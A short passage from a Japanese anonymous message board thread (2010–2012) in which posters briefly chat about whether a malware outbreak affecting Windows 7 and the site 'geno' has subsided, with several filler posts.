560 :192.168.0.774:2010/01/11(月) 23:49:13 ID:WnL+xizZ0
windows7って対処方法ないんだよなわろす
561 :192.168.0.774:2010/05/01(土) 17:49:02 ID:lXIq/NWf0
そもそも感染しないから対処する必要はないしね
感染報告はガセだし
感染報告はガセだし
562 :192.168.0.774:2010/08/15(日) 06:54:45 ID:rSMCCoZe0
もう流行は収束したんかい?
あ
564 :192.168.0.774:2010/10/26(火) 18:47:55 ID:4nqm+9mx0
dd
565 :192.168.0.774:2011/01/08(土) 15:54:57 ID:24P3dcU50
566 :192.168.0.774:2011/05/11(水) 00:06:02.13 ID:uDZNuz8R0
genoにはいい宣伝になったろ
567 :192.168.0.774:2011/06/24(金) 23:38:35.07 ID:t2KAPW550
潰れかけてるがwww
568 :192.168.0.774:2012/02/14(火) 06:54:11.24 ID:fOKWHCt10
結局の所おさまったんか?
あげ